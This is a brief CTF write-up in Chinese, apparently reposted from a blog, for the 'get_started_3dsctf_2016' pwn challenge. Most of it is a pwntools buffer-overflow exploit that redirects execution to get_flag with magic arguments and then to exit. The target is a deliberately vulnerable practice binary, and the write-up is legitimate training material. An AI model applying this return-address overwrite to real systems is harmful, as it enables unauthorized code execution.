pwn | get_started_3dsctf_2016
作者:互联网
get_started_3dsctf_2016
ret2text
坑爹题,程序异常结束就无回显,得跳转到exit函数
exp:
from pwn import *
import time
context.log_level = 'debug'
sh = remote('node4.buuoj.cn', 25656)
p_getflag = 0x80489a0
p_main = 0x08048A20
p_exit = 0x0804E6A0
# sh.recv(1024)
payload = 0x38 * b'm' + p32(p_getflag) + p32(p_exit) + p32(0x308CD64F) + p32(0x195719D1)
sh.sendline(payload)
sh.interactive()
sh.close()
标签:get,started,3dsctf,p32,sh,exit,pwn,import,payload 来源: https://www.cnblogs.com/Mz1-rc/p/15568842.html